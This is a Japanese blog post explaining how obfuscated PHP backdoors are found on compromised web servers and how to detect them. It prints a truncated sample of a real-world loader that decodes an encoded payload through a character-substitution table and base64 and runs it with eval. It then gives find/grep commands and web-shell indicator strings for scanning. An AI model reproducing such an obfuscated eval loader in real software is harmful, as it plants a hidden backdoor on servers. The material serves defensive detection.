不正プログラムを仕込む方法

WEBサイトは、常にセキュリティリスクに晒されています。

今回は、実際にどのようなプ不正ログラムが仕込まれるのか、

具体例をご紹介します。

実際にサーバーに仕込まれたPHPファイルの例

<?php
 $qmlzu = 7553; function ohsvbulv($pufdgzrhwj, $rvxeigcobb){$nhnbjg = ''; for($i=0; $i < strlen($pufdgzrhwj); $i++){$nhnbjg .= isset($rvxeigcobb[$pufdgzrhwj[$i]]) ? $rvxeigcobb[$pufdgzrhwj[$i]] : $pufdgzrhwj[$i];}
$bmrfc="base" . "64_decode";return $bmrfc($nhnbjg);}
$ycisv = 'C6SQn1RXw2CyBV1GhKRG2VxAwGhmpIL1zIk9gk35C6SQn1RXw2CyBVxAwrRShJBAhJqJdbsk5zm0bD79WK'.
'SehV135bOut2Hew2HSti13nlRQ2iZ9WlTJdbsk5zm0bD7Xw2ZeO6Suw1Rmnlr9ObYk5zm0bY35nl'.
'tyn20Xw2CyBNRzZ1BlZ1p95C35ck35baZeT31a1D1alGOCaN7eT31qZfOOpF3YpfPfg'.
'Gs0bYDD2r0NTSwNTSmJTD10zrZN23NIZNpJ2asRpbpxqUhQqb4kdUIfgk35blSK5bNSW27'.
'3caYD2r0NTSwNTSmJaNZTTNRt23wETSO7TDZNZNR6zrpJ2aD9FCyBck35bCDD2r0NTSwNTS'.
'mJaNZTTNRt23wETSO7TDZNZNR6zrpJ2asRpbpxqUhQqb4kdUIfgk35b230bJ30bKSK56S'.
~略（数百行）~
'XlGBGpSrWpKpf2asRpbZftlCoFCy0bYSGw2ZrhK4YhV1GnlNmn29S5bZGw2q9gk35eC35FCyDtV'.
'RQwKSJpF3Yt2BGt2SeOKNmOl1X5bZeTIRz1bDoFCyDhK1XpF3YOvSkwzNehV1QwbYDtVRQw'.
'KSJlX7O5zm0bKSKpbYDhK1X5a7oFCyYpbsYwl0yWGsDhK1Xgk35eC35FC9Sc6S35bDo';
$bjemukctfl = Array('1'=>'V', '0'=>'N', '3'=>'0', '2'=>'X', '5'=>'K', '4'=>'4', '7'=>'B', '6'=>'G', '9'=>'p', '8'=>'r', 'A'=>'v', 'C'=>'Q', 'B'=>'J', 'E'=>'P', 'D'=>'k', 'G'=>'y', 'F'=>'D', 'I'=>'E', 'H'=>'h', 'K'=>'m', 'J'=>'n', 'M'=>'q', 'L'=>'5', 'O'=>'d', 'N'=>'F', 'Q'=>'u', 'P'=>'8', 'S'=>'l', 'R'=>'9', 'U'=>'j', 'T'=>'U', 'W'=>'b', 'V'=>'2', 'Y'=>'g', 'X'=>'z', 'Z'=>'R', 'a'=>'S', 'c'=>'e', 'b'=>'C', 'e'=>'f', 'd'=>'L', 'g'=>'O', 'f'=>'i', 'i'=>'3', 'h'=>'c', 'k'=>'w', 'j'=>'6', 'm'=>'s', 'l'=>'W', 'o'=>'7', 'n'=>'a', 'q'=>'M', 'p'=>'I', 's'=>'A', 'r'=>'1', 'u'=>'t', 't'=>'Y', 'w'=>'Z', 'v'=>'H', 'y'=>'o', 'x'=>'x', 'z'=>'T');
eval/*eys*/(ohsvbulv($ycisv, $bjemukctfl));?>

この例では、base64という形式でプログラム言語を変換し、

さらに、Arrayで文字列を変換し、ソースコードを暗号化しています。

この暗号化したプログラムを、最後にeval関数で実行しているのです。

※base64をデコードして、プログラムを読みたい場合は、

このようなサイトで変換して、解読する必要があります。

不正ファイルの検出方法

このようなPHPファイルが、サーバーに仕込まれるのは、

様々な理由があります。

プログラムの脆弱性、古いバージョンのプラグイン使用、その他セキュリティ不備、等々。

不正に仕込まれたファイルは、1個の場合もあれば、数百数千ファイルに渡る場合もあります。

一つ一つファイルを開いて、書き換えられていないか確認するのは不可能です。

方法としては、

①ウィルスソフトでチェックする

②Shellコマンドでチェックする

の2通りがあります。

ウィルスソフトでチェックする

サーバー上のファイルをローカルに保存し、ウィルスチェックソフトにかける方法です。

自分のパソコンにインストールした、ウィルスソフト（ウィルスバスターやNortonなど）の機能で、

該当ファイル一式を診断します。

ただし、全て検出しきることが出来ない場合もあります。

Shellコマンドでチェックする

Shellコマンドで特定の文字列を検索する方法です。

たとえば、「eval」や「64_decode」という文字列は、不正プログラム実行で多用されます。

このような「悪さをしていそうな文字列※」を指定し、検索します。

find . -type f -name \*.php -exec grep -H "64_decode" {} \;

↑「64_decode」という文字列がphpファイルに存在しないか検索するスクリプト例。

※他にも、「istart」や「@copy」、「FilesMan」など多数あります

また、多くの不正ファイルは、PHPファイルが仕込まれることが多いのですが、

たとえば、画像(image)フォルダには、本来PHPファイルは存在しないはずです。

こういうパターンをチェックする場合は、

find . -type d -name image -exec find {} -name \*.php -ls \;

↑imageフォルダ内にPHPファイルが存在していないかどうかチェックするスクリプト例。

ハッカーたちは、こういったプログラムを使っています。

セキュリティ被害に遭ってしまった場合のご参考に。